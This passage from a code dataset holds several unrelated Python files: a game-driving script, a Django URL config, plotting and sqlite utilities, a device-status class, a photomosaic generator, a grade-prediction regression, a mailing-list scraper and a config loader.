pd\nfrom keras.utils import np_utils\nfrom keras.preprocessing import image\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom directkeys import PressKey, ReleaseKey, W, A, S, D\nfrom mss import mss\n\nmodel = load_model('model.h5')\nmonitor = {'top': 0, 'left': 0, 'width': 1100, 'height': 820}\n\nscalefactorvertical = 0.39024\nscalefactorhorizontal = 0.38818\n\ndef execute():\n current = get_steer_wheel()\n aim = predict_steer_wheel()\n if (current < aim - 0.02):\n PressKey(A)\n ReleaseKey(D)\n print(\"%s < %s\" % (current, aim))\n elif (current > aim + 0.02):\n PressKey(D)\n ReleaseKey(A)\n print(\"%s > %s\" % (current, aim))\n else:\n ReleaseKey(A)\n ReleaseKey(D)\n print(\"%s ~= %s\" % (current, aim))\n\ndef get_steer_wheel():\n r = requests.get('http://192.168.0.227:25555/api/ets2/telemetry')\n r = r.json()\n return r['truck']['gameSteer'] \n\ndef is_game_paused():\n r = requests.get('http://192.168.0.227:25555/api/ets2/telemetry')\n r = r.json()\n return r['game']['paused'] \n\ndef predict_steer_wheel():\n global model, scalefactorvertical, scalefactorhorizontal\n with mss() as sct:\n sct_img = sct.grab(monitor)\n img = Image.frombytes('RGB', sct_img.size, sct_img.rgb) \n img = img_to_arr(img)\n img = normalize(img) \n img = cv2.resize(img, None, fx=scalefactorhorizontal, fy=scalefactorvertical, interpolation=cv2.INTER_AREA)\n return model.predict(np.array([img]))\n\ndef img_to_arr(img):\n img = image.img_to_array(img)\n return img\n\ndef normalize(img):\n img[:,:,0] -= 94.9449\n img[:,:,0] /= 58.6121\n\n img[:,:,1] -= 103.599\n img[:,:,1] /= 61.6239\n\n img[:,:,2] -= 92.9077\n img[:,:,2] /= 68.66\n return img\n\ndef get_speed():\n r = requests.get('http://192.168.0.228:25555/api/ets2/telemetry')\n r = r.json()\n return r['truck']['speed'] \n\n\nwhile is_game_paused():\n time.sleep(0.2)\n\nwhile is_game_paused() == False:\n execute() \n #if(get_speed() <= 20):\n # PressKey(W)\n #else:\n # ReleaseKey(W)\n time.sleep(0.1)\n\nReleaseKey(W)\n\n","sub_path":"kappa/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"113154637","text":"\"\"\"bbs URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url,include\nfrom django.contrib import admin\nfrom blog import views\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n # 登陆、注销、验证码\n url(r'^login/', views.login),\n url(r'^logout/', views.logout),\n url(r'^v-code/', views.v_code),\n\n # 滑动验证\n url(r'^slide-login/', views.slide_login),\n url(r'^pcgetcaptcha/', views.pcgetcaptcha),\n\n\n url(r'^index/', views.index),\n # 注册\n url(r'^register/', views.register),\n\n\n url(r'^test/', views.test),\n\n url(r'^blog/', include('blog.urls')),\n\n # 点赞\n url(r'^updown/', views.updown),\n\n]\n","sub_path":"bbs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"129530100","text":"#!/usr/bin/env python\n__author__ = \"Pedro Heleno Isolani\"\n__copyright__ = \"Copyright 2018, The SDN WiFi MAC Manager\"\n__license__ = \"GPL\"\n__version__ = \"1.0\"\n__maintainer__ = \"Pedro Heleno Isolani\"\n__email__ = \"pedro.isolani@uantwerpen.be\"\n__status__ = \"Prototype\"\n\n\" Python script for making graphs with CSV output\"\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\n\ndef make_graph(experiment_path, filename):\n\n # Applying Seaborn style\n # whitegrid, darkgrid, whitegrid, dark, white, and ticks\n sns.set(style=\"whitegrid\", font_scale=1.5, font='Times New Roman')\n\n # Reading ICMP CSV results\n icmp_data_dict = read_icmp_results(experiment_path=experiment_path,\n filename=filename)\n\n #print(icmp_data_dict)\n fig, host = plt.subplots(figsize=(10, 3.4), dpi=144)\n\n #ax1 = plt.subplot(311)\n #plt.setp(host.get_xticklabels())\n\n # Adjust x Axis\n plt.tight_layout()\n\n p1, = host.plot(icmp_data_dict['x_axis']['values'], icmp_data_dict['y_axis']['values'], 'b-', marker=\"d\",\n markevery=1, markersize=10, mfc='none', markeredgewidth=2,\n label=\"Single Slice\")\n p2, = host.plot(icmp_data_dict['x_axis']['values'], icmp_data_dict['y1_axis']['values'], \"-y\", marker=\"x\",\n markevery=1, markersize=10, mfc='none', markeredgewidth=2, #linewidth=3.5,\n label=\"Static Slices\")\n p3, = host.plot(icmp_data_dict['x_axis']['values'], icmp_data_dict['y2_axis']['values'], \"-g\", marker=\"o\",\n markevery=1, markersize=10, mfc='none', markeredgewidth=2, #linewidth=2.0,\n label=\"Adaptive Slices\")\n\n axis_padding = 0.4 # percentage\n host.set_xlim(min(icmp_data_dict['x_axis']['values']),\n max(icmp_data_dict['x_axis']['values']))\n host.set_ylim(0,\n max(icmp_data_dict['y_axis']['values']+icmp_data_dict['y1_axis']['values']) +\n (max(icmp_data_dict['y_axis']['values']+icmp_data_dict['y1_axis']['values'])*axis_padding))\n\n host.set_xlabel(\"Time (sec)\")\n host.set_ylabel(\"Latency (ms)\")\n\n lines = [p1, p2, p3]\n\n #plt.title(\"TESTE\")\n plt.legend(lines, [l.get_label() for l in lines], loc='upper center', bbox_to_anchor=(0.5, 1.00), ncol=3) #shadow=True)\n plt.savefig(experiment_path + 'latency_results.pdf', format=\"pdf\")\n\n plt.show()\n print('Done!')\n\n\ndef read_icmp_results(experiment_path, filename):\n data_dict = {'x_axis': {'label': '', 'values': []},\n 'y_axis': {'label': '', 'values': []},\n 'y1_axis': {'label': '', 'values': []},\n 'y2_axis': {'label': '', 'values': []}}\n\n df = pd.read_csv(experiment_path + filename, sep=',', header=0)\n header_names = {'x_axis': 'Time (sec)',\n 'y_axis': 'Single Slice Latency (ms)',\n 'y1_axis': 'Static Slices Latency (ms)',\n 'y2_axis': 'Adaptive Slices Latency (ms)'}\n\n # Populating with the header fields\n for header_value in df.columns.values:\n for key, value in header_names.items():\n if value in header_value:\n data_dict[key]['label'] = header_value\n data_dict[key]['values'] = []\n\n # Populating with the values\n for index, row in df.iterrows():\n for key, value in data_dict.items():\n data_dict[key]['values'].append(row[value['label']])\n\n return data_dict\n\n\nmake_graph(experiment_path=\"/Users/phisolani/Github/wifi_monitoring/graphs/sdn_based_slicing/latency_results/\",\n filename=\"latency_overall_plot.csv\")\n\n","sub_path":"graphs/sdn_based_slicing/median_latency_plot.py","file_name":"median_latency_plot.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"629334992","text":"#Jiajie Mai and Daniel Keriazis\n#SoftDev1 pd7\n#K16 No Trouble\n#2018-10-04\n\nimport sqlite3 # Enable control of an sqlite database\nimport csv # Facilitates CSV I/O\n\nDB_FILE=\"database.db\"\n\ndb = sqlite3.connect(DB_FILE) # Open if file exists, otherwise create\nc = db.cursor() # Facilitate db ops\n\ncounts = {}\ntotals = {}\naverages = {}\nnames = {}\n\ncommand = \"SELECT name,code,mark,courses.id FROM courses,peeps WHERE courses.id = peeps.id\"\nc.execute(command)\n\nfor i in c.fetchall(): # Get output of SELECT statement\n name, code, mark, student = i\n if student not in counts:\n counts[student] = 0\n totals[student] = 0\n counts[student] += 1\n totals[student] += mark\n names[student] = name\n\n# Iteratre through all student ids and add them to the averages dict\nfor student in counts:\n total = totals[student]\n count = counts[student]\n averages[student] = round(total / count, 1) # Calculate average\n print(names[student], student, averages[student])\n\n# Create table peeps_avg with unique ids corresponding to student averages\nc.execute(\"CREATE TABLE peeps_avg (id INT PRIMARY KEY, avg INT)\")\n\n# Add rows to peeps_avg with id and avg\nfor student in averages:\n c.execute(\"INSERT INTO peeps_avg VALUES ({id}, {avg})\" # Add new row\n .format(id=student, avg=averages[student])) # Use proper values\n\ndb.commit() # Save changes\ndb.close() # Close database\n","sub_path":"Work/16_csv2db/16_csv2db.py","file_name":"16_csv2db.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"545894605","text":"\"\"\"Classes\"\"\"\nimport datetime\n\nclass Device(object):\n \"\"\"Device info\"\"\"\n def __init__(self, name, mac):\n self.name = name\n self.mac = mac\n self.ipv4 = \"\"\n self.last_seen = datetime.datetime.now() - datetime.timedelta(days=1)\n self.running_arping = False\n self._online = False\n self._broadcast_state_change = False\n self._last_message = \"\"\n\n def is_active(self, secs):\n \"\"\"Returns a bool indicating if the Device has been active in the last sec seconds\"\"\"\n active = self.last_seen + datetime.timedelta(seconds=secs) >= datetime.datetime.now()\n return active\n\n def seen(self, **kwargs):\n \"\"\"\n Updates last_seen to now(), which changes the status to Online\n Optionally sets the ip\n \"\"\"\n self._set_online(True)\n self.last_seen = datetime.datetime.now()\n if 'ipv4' in kwargs:\n self.ipv4 = kwargs['ipv4']\n\n def unseen(self):\n \"\"\"Updates the device status to be Offline\"\"\"\n self._set_online(False)\n\n def get_status(self):\n \"\"\"Gets the status of the device. Statuses include Online, Offline, Arping\"\"\"\n if self.running_arping:\n return \"Arping\"\n else:\n if self._online:\n return \"Online\"\n else:\n return \"Offline\"\n\n def get_status_message(self, **kwargs):\n \"\"\"\n Gets a status message is the active status as changed.\n Once the message is generated, calling this function subsequent times will return \"\"\n unless the active status is changed or the optional param 'override' is True\n \"\"\"\n message = \"\"\n override = 'override' in kwargs and kwargs['override']\n if self._broadcast_state_change or override:\n self._broadcast_state_change = False\n message = self.name + \" is \"\n if self._online:\n message += \"online!\"\n else:\n message += \"gone!\"\n\n # if the message is the same as the last time someone asked, don't send it\n if self._last_message == message and not override:\n message = \"\"\n else:\n self._last_message = message\n\n return message\n\n def _set_online(self, is_online):\n \"\"\"sets online status\"\"\"\n if is_online != self._online:\n self._broadcast_state_change = True\n self._online = is_online\n","sub_path":"psb/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"258846110","text":"import unittest\nimport HTMLTestRunner\n#加载所有用例,并且执行\ndef allcase():\n casedir=\"D:\\liang\"\n testcase=unittest.TestSuite()\n discover=unittest.defaultTestLoader.discover(casedir,pattern=\"test_*.py\",top_level_dir=None)\n testcase.addTests(discover)# 直接加载discover\n print(testcase)\n return testcase\n\nif __name__ ==\"__main__\":\n outfile = open(\"d:\\\\liang\\\\testcase\\\\report\\\\report.html\", \"w\")\n runner1 = HTMLTestRunner.HTMLTestRunner(\n stream=outfile,\n title='自动化测试报告',\n description='用例执行情况'\n )\n\n runner1.run(allcase())\n outfile.close()\n","sub_path":"加载所有用例执行.py","file_name":"加载所有用例执行.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"158224934","text":"\"\"\"Finds a directory or file inside the current project.\"\"\"\nfrom . import DodoCommand\nfrom dodo_commands.framework.config import (CommandPath, get_project_dir)\nimport os\nimport sys\n\n\nclass Command(DodoCommand): # noqa\n def add_arguments_imp(self, parser): # noqa\n \"\"\"\n Entry point for subclassed commands to add custom arguments.\n \"\"\"\n parser.add_argument(\n 'what',\n nargs='?',\n help=(\n 'Print the value of /ROOT/<what>_dir. For example: ' +\n '\"dodo which src\" prints the value of /ROOT/src_dir.')\n )\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n '--config',\n action=\"store_true\",\n help='Print where the config file is')\n group.add_argument(\n '--script',\n help='Print where the dodo command script with given name is')\n\n def handle_imp(self, what, config, script, **kwargs):\n if config:\n print(\n os.path.join(\n get_project_dir(), \"dodo_commands\", \"res\", \"config.yaml\"\n )\n )\n elif script:\n command_path = CommandPath(self.config)\n for item in command_path.items:\n script_path = os.path.join(\n item.full_path, script + \".py\"\n )\n if os.path.exists(script_path):\n sys.stdout.write(script_path + \"\\n\")\n elif what:\n sys.stdout.write(self.get_config(\"/ROOT/%s_dir\" % what) + \"\\n\")\n else:\n sys.stdout.write(self.get_config(\"/ROOT/project_name\") + \"\\n\")\n","sub_path":"dodo_commands/extra/standard_commands/which.py","file_name":"which.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"210779770","text":"from PIL import Image\r\nfrom os import listdir, path\r\n\r\nclass Mosaic(object):\r\n \"\"\"A Mosaic class that can create, store and save a photomosaic image.\"\"\"\r\n \r\n def __init__(self, path):\r\n \"\"\"Create a picture database that stores all images from directory \r\n specified by path.\"\"\"\r\n \r\n self.PICTURE_DATABASE = listdir(path)\r\n self.path = path\r\n self.mosaic = None\r\n \r\n def _images_database(self, dirlist):\r\n \"\"\"Return a list of lists with images from dirlist \r\n as the first element in nested lists and their average colour value \r\n as the second element. i.e. \r\n [[image.jpg, _colour_average], [image2, _colour_average]]\r\n -dirlist is a list of filenames for images.\"\"\"\r\n \r\n outer = []\r\n for i in xrange(len(dirlist)):\r\n inner = []\r\n image = Image.open(path.join(self.path, dirlist[i]))\r\n inner.append(image)\r\n inner.append(_colour_average(image))\r\n outer.append(inner)\r\n return outer\r\n \r\n def _closest_match(self, pic, images):\r\n \"\"\"Return an image from database, with closest average colour value\r\n to pic's average colour value, resized to match pic.\r\n -pic is a picture\r\n -images is a list database of lists containing\r\n [image, colour average of image]\r\n \"\"\"\r\n \r\n pic_col = _colour_average(pic)\r\n # Store the image with the smallest _distance from pic in a list \r\n # to resize\r\n closest = min([[_distance(pic_col, image[1]), image[0]]\r\n for image in images])\r\n resized = closest[1].resize(pic.size)\r\n return resized\r\n \r\n def create_mosaic(self, filename, min_size):\r\n \"\"\"Create and store a photomosaic version of a single picture specified\r\n by filename. min_size determines the smallest height or width of \r\n the picture to start replacing with pictures in PICTURE_DATABASE.\"\"\"\r\n \r\n def _create_mosaic(image, min_size, database):\r\n \"\"\"Create and store a photomosaic version of image. min_size \r\n determines the smallest height or width of the picture to start \r\n replacing with pictures from database.\"\"\"\r\n \r\n size = image.size\r\n width, height = size[0], size[1]\r\n if width < min_size or height < min_size:\r\n # Find an image from database with smallest distance\r\n best_match = self._closest_match(image, database)\r\n return best_match\r\n else:\r\n # Recurse on four different quadrants\r\n q1 = (0, 0, (width / 2), (height / 2))\r\n q2 = ((width / 2), 0, width, (height / 2))\r\n q3 = (0, (height / 2), (width / 2), height)\r\n q4 = ((width / 2), (height / 2), width, height) \r\n image.paste(_create_mosaic(image.crop(q1), min_size, \r\n database), q1)\r\n image.paste(_create_mosaic(image.crop(q2), min_size,\r\n database), q2)\r\n image.paste(_create_mosaic(image.crop(q3), min_size,\r\n database), q3)\r\n image.paste(_create_mosaic(image.crop(q4), min_size,\r\n database), q4)\r\n return image\r\n \r\n pic = Image.open(filename)\r\n database = self._images_database(self.PICTURE_DATABASE)\r\n self.mosaic = _create_mosaic(pic, min_size, database)\r\n return self.mosaic\r\n\r\n def save_as(self, filename):\r\n \"\"\"Save the stored photomosaic as a jpg file named filename.\"\"\"\r\n \r\n if self.mosaic:\r\n self.mosaic.save(filename, 'JPEG')\r\n\r\n#====START: Helper Functions for importing============================\r\ndef _colour_average(image):\r\n \"\"\"Return a tuple that contains the average RGB value of image.\"\"\"\r\n \r\n histo = image.histogram()\r\n average_red, average_green, average_blue = 0, 0, 0\r\n size = image.size[0] * image.size[1]\r\n for i in xrange(256):\r\n average_red += (i * histo[:256][i])\r\n average_green += (i * histo[256:512][i])\r\n average_blue += (i * histo[512:][i])\r\n return (average_red / size, average_green / size, \r\n average_blue / size)\r\n\r\ndef _distance(col1, col2):\r\n \"\"\"Return the euclidean of col1 and col2. col1 and col2 are both\r\n tuples representing RGB colour values.\"\"\"\r\n \r\n red1, blue1, green1 = col1[0], col1[1], col1[2]\r\n red2, blue2, green2 = col2[0], col2[1], col2[2]\r\n distance = (((red1 - red2) ** 2) + ((blue1 - blue2) ** 2) + \\\r\n ((green1 - green2) ** 2)) ** 0.5\r\n return distance\r\n#====END========================================================\r\n","sub_path":"class projects/CSC148/mosaic/mosaic.py","file_name":"mosaic.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"137018945","text":"import extract_scores as es\nimport sys\nimport logger\nimport random\nimport os\nimport numpy as np\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import mean_absolute_error\nfrom math import sqrt\nimport datetime\n\nFILE_LOG = 'ssr_%s.txt'\nsys.stdout = logger.Logger(FILE_LOG % datetime.datetime.now().strftime('%Y%m%d%H%M%S'))\n\n# if a course has less than 5 pre-courses, it fails in predicting\nMIN_NUM_PRE_COURSES = 5\n# if the card of training set is less than 10, it fails in predicting\nMIN_NUM_TRAINING_SET_ITEMS = 5\n# if the student has attended less than 100% of the previous courses that the target student has for the target course,\n# it fails in predicting\nMIN_OVERLAPPING_RATE = 1\nPERCENTAGE_TRAIN_SET = 0.99\nFILE_PREFIX_TEST = '../new/ssr/test_course_'\nFILE_PREFIX_TRAIN = '../new/ssr/train_course_'\n\n\ndef split_train_test():\n train_idx = random.sample(range(len(es.m_students)), int(PERCENTAGE_TRAIN_SET * len(es.m_students)))\n test_idx = list(set(range(len(es.m_students))) - set(train_idx))\n return train_idx, test_idx\n\n\ndef get_pre_courses(student, course):\n \"\"\"\n Get the previous courses that a target student has taken before the target course.\n :param student: the index of the target student\n :param course: the index of the target course\n :return: the previous courses list or None indicating the target student has not taken the target course\n \"\"\"\n if es.m_scores[student, course] == 0 or es.m_terms[student, course] == 1:\n return None\n this_student_courses = es.m_scores[student, :].nonzero()[1]\n this_student_terms = [es.m_terms[student, i] for i in this_student_courses]\n assert len(this_student_courses) == len(this_student_terms)\n this_student_courses_terms = [{'c': this_student_courses[i], 't': this_student_terms[i]}\n for i in range(len(this_student_courses))]\n this_student_courses_terms.sort(key=lambda i: i['t'])\n pre_courses = []\n this_term = this_student_terms[this_student_courses.tolist().index(course)]\n for item in this_student_courses_terms:\n if item['t'] < this_term:\n pre_courses.append(item['c'])\n else:\n break\n return set(pre_courses)\n\n\ndef run_ssr_ridge(train_idx, student, course):\n \"\"\"\n Predict the score of a target course for a target student using the method of \"Student Specific Regression (SSR)\".\n The basic notion of the method is to find out all the other students that has taken a sufficient number of previous\n courses same as the target student, and to use these historical data for training the model. This method may fail if\n there is not sufficient number of previous courses, or there is not sufficient number of students that satisfy this\n condition.\n :param train_idx: the list of index of training set (i.e., student id's in the training set)\n :param student: the index of the target student\n :param course: the index of the target course\n :return: the predicted score or -1 indicating failure in predicting\n \"\"\"\n valid_train_index = []\n pre_course = get_pre_courses(student, course)\n if pre_course is None or len(pre_course) < MIN_NUM_PRE_COURSES:\n return -1\n for i in train_idx:\n pre_course_i = get_pre_courses(i, course)\n if pre_course_i is not None and pre_course.issubset(pre_course_i):\n valid_train_index.append(i)\n # print(valid_train_index)\n valid_train_x = es.m_scores[valid_train_index, :][:, list(pre_course)].todense()\n valid_train_y = es.m_scores[valid_train_index, :][:, course].todense()\n # print(valid_train_x, valid_train_y)\n if len(valid_train_x) < MIN_NUM_TRAINING_SET_ITEMS:\n return -1\n valid_train_y = np.transpose(valid_train_y).flat\n reg = linear_model.RidgeCV(alphas=[10.0, 100.0, 1000.0, 10000.0, 100000.0])\n reg.fit(valid_train_x, valid_train_y)\n predicted_y = reg.predict(es.m_scores[student, :][:, list(pre_course)])\n return predicted_y\n\n\nif __name__ == '__main__':\n training, testing = split_train_test()\n total_predicted = []\n total_actual = []\n for idx, s in enumerate(testing):\n s_predicted = []\n s_actual = []\n print('Predicting student %d: %.2f%% from total' % (s, idx/len(testing)*100))\n for c in es.m_scores[s, :].nonzero()[1]:\n predicted = run_ssr_ridge(training, s, c)\n if predicted == -1:\n continue\n actual = es.m_scores[s, c]\n s_predicted.append(predicted)\n s_actual.append(actual)\n print(' Succeeded on student %d, course %d: predicted: %.1f; actual: %.1f' % (s, c, predicted, actual))\n if len(s_predicted) > 0:\n rms = sqrt(mean_squared_error(s_actual, s_predicted))\n mae = mean_absolute_error(s_actual, s_predicted)\n print('RMSE, MAE for student %d on %d courses: %f' % (s, len(s_predicted), rms))\n else:\n print('Failed predicting student %d' % s)\n total_predicted += s_predicted\n total_actual += s_actual\n total_rmse = sqrt(mean_squared_error(total_actual, total_predicted))\n total_mae = mean_absolute_error(total_actual, total_predicted)\n print('Total RMSE: %f' % total_rmse)\n print('Total MAE: %f' % total_mae)","sub_path":"src/student_specific_regression.py","file_name":"student_specific_regression.py","file_ext":"py","file_size_in_byte":5317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"552439978","text":"# -*- coding: utf-8 -*-\nimport logging\n\nimport scrapy\n\ntry:\n import urlparse\n from urllib import urlencode\nexcept: # For Python 3\n import urllib.parse as urlparse\n from urllib.parse import urlencode\n\n\n# url_parts = list(urlparse.urlparse(url))\n# query = dict(urlparse.parse_qsl(url_parts[4]))\n# query.update(params)\n#\n# url_parts[4] = urlencode(query)\n#\n# print(urlparse.urlunparse(url_parts))\n\n\nclass JythonMlSpider(scrapy.Spider):\n \"\"\"Jython ML Spider\"\"\"\n name = 'jython_ml'\n allowed_domains = [\"sourceforge.net\"]\n start_urls = ['https://sourceforge.net/p/jython/mailman/jython-users/?limit=%s&style=threaded']\n\n def __init__(self, page_size=30, *args, **kwargs):\n self._page_size = page_size\n self.start_urls = map(lambda x: x % self._page_size, self.start_urls)\n\n super(JythonMlSpider, self).__init__(*args, **kwargs)\n\n def parse(self, response):\n origin = response.url\n\n # Parse other pages\n logging.info(\"Parse pagination for: %s\" % origin)\n\n for page_list in response.css('div.page_list a.pager_link'):\n logging.info(\"Process page link `%s' for: %s\" % (page_list.extract(), origin))\n\n content = page_list.css('::text').extract()[0].strip()\n url = page_list.css('::attr(href)').extract()[0]\n url = response.urljoin(url)\n\n if content == u'>':\n yield scrapy.Request(url, callback=self.parse)\n break # Only once!\n\n # Parse threads\n logging.info(\"List threads in: %s\" % origin)\n for href in response.css('table.threaded-list a::attr(href)'):\n full_url = response.urljoin(href.extract())\n parsed = urlparse.urlparse(full_url)\n\n no_frag = u\"%s://%s%s\" % (parsed.scheme, parsed.netloc, parsed.path)\n\n logging.info(\"Enqueue thread `%s' for %s\" % (no_frag, origin))\n yield scrapy.Request(no_frag, callback=self.parse_thread)\n\n def parse_thread(self, response):\n origin = response.url\n logging.info(\"Parse thread in: %s\" % origin)\n\n for message in response.css('div.thread-message'):\n message_url = message.css('.email-header a::attr(href)').extract()[0]\n parsed = urlparse.urlparse(message_url)\n discussion_id = parsed.path.split('/')[-1]\n import IPython\n IPython.embed()\n message_id = message.css('table::attr(id)').extract()[0]\n title = message.css('.email-header a::text').extract()[0]\n meta = message.css('.email-header small').extract()[0]\n body = message.css('.email-body pre::text').extract()[0]\n\n yield {\n 'discussion_id': discussion_id,\n 'message_id': message_id,\n 'title': title,\n 'meta': meta,\n 'body': body,\n }\n","sub_path":"jython_ml.py","file_name":"jython_ml.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"543003535","text":"file = open(\"teams.txt\",\"rt\")\r\nteam = \"nonempty\"\r\nwhile (team != \"\"):\r\n team = file.readline()\r\n if (team != \"\"): print (team[:-1]) #get rid of extra newline character\r\n #print(len(team))\r\n #print(team[2:])\r\nfile.close()\r\n#-------------------------------------------------------------------------------------------------------------------\r\nlist=['α','β','g','e'] #list = ['florida','clemson','duke']\r\nlist.append('114')\r\n#print ('αυτη ειναι η λιστα:',list)\r\nprint()\r\nfile=open ('teams.txt','wt')#grafei kathe fora kainourgia lista sto arxeio,an (a)prosthetei kathe fora \r\nfor j in list:\r\n file.write(j)\r\nfile.write('\\n') #for j in list:file.write(j+'\\n')->ta grafei katakoryfa sto arxeio\r\nfile.close()\r\n\r\n#file = open(\"teams.txt\",\"rt\")\r\n#team = file.readlines()\r\n#print(team)\r\n#print()\r\n#print(team[35:])\r\n#file.close()\r\n","sub_path":"python33/arxeia_diaxeirisi/arxeio_listas_teams.py","file_name":"arxeio_listas_teams.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"611808113","text":"# BSD Licence\n# Copyright (c) 2010, Science & Technology Facilities Council (STFC)\n# All rights reserved.\n#\n# See the LICENSE file in the source distribution of this software for\n# the full license text.\n\n\"\"\"\nmetaconfig\n----------\n\nWe want to do:\n\n{{{\nimport metaconfig\n\n# Config is a ConfigParser instance (or subclass)\n# Returns the lowest level config file available (e.g. if __name__ == 'foo.bar.baz' and there is a config \n# defined for 'foo.bar' use that.\nconfig = metaconfig.get_config(__name__)\n}}}\n\n\nThese options are bootstraped on entry into Python as:\n\n{{{\nimport metaconfig\n\nmetaconfig.add_config_file(name, path)\nmetaconfig.add_config(name, configParser)\nmetaconfig.metaconfig(metaconfig)\nmetaconfig.metaconfig_file(metaconfig_file)\nmetaconfig.from_argv()\n\nor something like that\n}}}\n\n\n\"\"\"\n\nimport sys, os\nimport ConfigParser\nimport re\n\nimport logging\nimport logging.config\nlog = logging.getLogger(__name__)\n\nclass Error(Exception):\n pass\n\nDEFAULT_CONFIG_PARSER = ConfigParser.ConfigParser\n\nclass MetaConfig(object):\n def __init__(self):\n self._configs = {}\n\n def add_config_file(self, name, path, ConfigClass=DEFAULT_CONFIG_PARSER):\n\n log.info('Adding config %s from path %s' % (name, path)) \n conf = ConfigClass()\n conf.read([path])\n\n return self.add_config(name, conf)\n\n\n def add_config_fh(self, name, fileobj, ConfigClass=DEFAULT_CONFIG_PARSER):\n\n log.info('Adding config %s from file object' % name)\n conf = ConfigClass()\n conf.readfp(fileobj)\n\n return self.add_config(name, conf)\n\n def add_config(self, name, config_parser):\n if name in self._configs:\n Error(\"Config %s already exists\" % name)\n else:\n config_parser.__config_name__ = name\n self._configs[name] = config_parser\n\n log.info('Config %s added' % name)\n\n return config_parser\n\n def get_config(self, name, ConfigClass=DEFAULT_CONFIG_PARSER, inherit=True):\n log.debug('Requested config %s, inherit=%s' % (name, inherit))\n\n if inherit:\n parts = name.split('.')\n while parts:\n name1 = '.'.join(parts)\n log.debug(\"Looking for config %s\" % name1)\n try:\n config = self._configs[name1]\n log.debug(\"Selected config %s\" % name1)\n return config\n except KeyError:\n parts = parts[:-1]\n \n if name in self._configs:\n log.debug(\"Selecting config %s\" % name)\n return self._configs[name]\n else:\n config = self.add_config(name, ConfigClass())\n log.debug(\"New config %s\" % name)\n return config\n \n\n @classmethod\n def from_config(klass, config_parser):\n mf = klass()\n\n mf._setup_includes(config_parser)\n mf._setup_logging(config_parser)\n mf._parse_nested_configs(config_parser)\n mf._parse_external_configs(config_parser)\n\n return mf\n\n @classmethod\n def from_config_file(klass, config_file):\n cnf = DEFAULT_CONFIG_PARSER()\n cnf.read(config_file)\n\n return klass.from_config(cnf)\n\n @classmethod\n def from_config_fh(klass, config_fh):\n cnf = DEFAULT_CONFIG_PARSER()\n cnf.readfp(config_fh)\n \n return klass.from_config(cnf)\n\n\n \n def _parse_nested_configs(self, config_parser):\n \"\"\"\n Parse configs embedded in the metaconfig file.\n \"\"\"\n if not config_parser.has_option('metaconfig', 'configs'):\n return\n\n configs = config_parser.get('metaconfig', 'configs').split()\n D = {}\n for section in config_parser.sections():\n mo = re.match(r'(.+?):(.+)', section)\n if not mo:\n continue\n prefix, ssec = mo.groups()\n D.setdefault(prefix, []).append(ssec)\n\n\n for config in configs:\n cp = DEFAULT_CONFIG_PARSER()\n for ssec in D[config]:\n sec = '%s:%s' % (config, ssec)\n\n if ssec.lower() == 'default':\n defaults = cp.defaults()\n for option in config_parser.options(sec):\n defaults[option] = config_parser.get(sec, option,\n raw=True)\n else:\n cp.add_section(ssec)\n for option in config_parser.options(sec):\n cp.set(ssec, option, config_parser.get(sec, option, \n raw=True))\n\n self.add_config(config, cp)\n\n def _parse_external_configs(self, config_parser):\n \"\"\"\n Parse external config files referenced in metaconfig.conf.\n \"\"\"\n if not config_parser.has_option('metaconfig', 'config-files'):\n return\n\n secname = config_parser.get('metaconfig', 'config-files')\n for opt in config_parser.options(secname):\n filename = config_parser.get(secname, opt)\n log.info('Reading external config %s from file %s' %\n (opt, filename))\n self.add_config_file(opt, filename)\n \n\n def _setup_includes(self, config_parser):\n \"\"\"\n Include external metaconfig files.\n\n \"\"\"\n if not config_parser.has_option('metaconfig', 'include'):\n return\n\n includes = config_parser.get('metaconfig', 'include').split()\n for include in includes:\n log.info(\"Including metaconfig: %s\" % include)\n config_parser.read(include)\n \n\n def _setup_logging(self, config_parser):\n \"\"\"\n Initialise logging from a nested config.\n\n \"\"\"\n if not config_parser.has_option('metaconfig', 'logging'):\n return\n\n logging_file = config_parser.get('metaconfig', 'logging')\n logging_file = os.path.expanduser(logging_file)\n\n logging.config.fileConfig(logging_file)\n log.info('Logging configuration initialised from %s' % 